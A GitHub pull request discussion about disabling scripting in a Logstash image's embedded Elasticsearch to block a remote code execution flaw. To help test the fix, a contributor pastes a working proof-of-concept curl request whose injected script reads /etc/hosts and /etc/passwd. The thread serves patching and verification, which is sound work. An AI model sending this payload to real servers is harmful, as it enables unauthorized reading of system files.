New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Disable scripting in embedded elastic search #33

Closed
wants to merge 1 commit into
base: develop
from

Conversation

Projects
None yet
2 participants
@davedevelopment
Copy link

davedevelopment commented Nov 18, 2014

The version of elasticsearch that comes with logstash 1.4.2 has quite a serious vulnerability, this patch helps prevent the remote code execution (I think). There might be a better way to do it, but I'll leave that to you :)

See http://bouk.co/blog/elasticsearch-rce/ for lots of info.

@pblittle pblittle self-assigned this Nov 19, 2014

@pblittle

This comment has been minimized.

Copy link
Owner

pblittle commented Nov 21, 2014

@davedevelopment, I haven't had a chance to review your change yet, I should be able to this weekend. Thanks for PR, I appreciate it.

@pblittle

This comment has been minimized.

Copy link
Owner

pblittle commented Dec 23, 2014

@davedevelopment do you mind giving me a curl command that will trigger the exploit before the fix is applied and will not trigger the exploit after the fix is applied?

There is an example [1] in the 1.4/tests directory. You may need to rebase first. A good bit has changed since your PR.

Thank you.

[1] https://github.com/pblittle/docker-logstash/blob/develop/1.4/tests/logstash.sh#L33

@pblittle

This comment has been minimized.

Copy link
Owner

pblittle commented Dec 23, 2014

@davedevelopment I created a feature/safer-embedded-elasticsearch branch. Will you please point this PR to that branch?

@davedevelopment

This comment has been minimized.

Copy link

davedevelopment commented Dec 24, 2014

Sorry, I don't really have time to rebase this right now, seems a lot has changed.

I did however copy this curl request from the page I previously mentioned, might work for you:

curl 'http://localhost:9200/_search?source=%7B%22size%22%3A1%2C%22query%22%3A%7B%22filtered%22%3A%7B%22query%22%3A%7B%22match_all%22%3A%7B%7D%7D%7D%7D%2C%22script_fields%22%3A%7B%22%2Fetc%2Fhosts%22%3A%7B%22script%22%3A%22import%20java.util.*%3B%5Cnimport%20java.io.*%3B%5Cnnew%20Scanner(new%20File(%5C%22%2Fetc%2Fhosts%5C%22)).useDelimiter(%5C%22%5C%5C%5C%5CZ%5C%22).next()%3B%22%7D%2C%22%2Fetc%2Fpasswd%22%3A%7B%22script%22%3A%22import%20java.util.*%3B%5Cnimport%20java.io.*%3B%5Cnnew%20Scanner(new%20File(%5C%22%2Fetc%2Fpasswd%5C%22)).useDelimiter(%5C%22%5C%5C%5C%5CZ%5C%22).next()%3B%22%7D%7D%7D&callback=jQuery1111005464234226383269_1419424336276&_=1419424336277' -H 'Accept: */*' -H 'Referer: http://bouk.co/blog/elasticsearch-rce/poc.html' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36' --compressed
@pblittle

This comment has been minimized.

Copy link
Owner

pblittle commented Dec 24, 2014

@davedevelopment, no problem at all. Thanks again.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment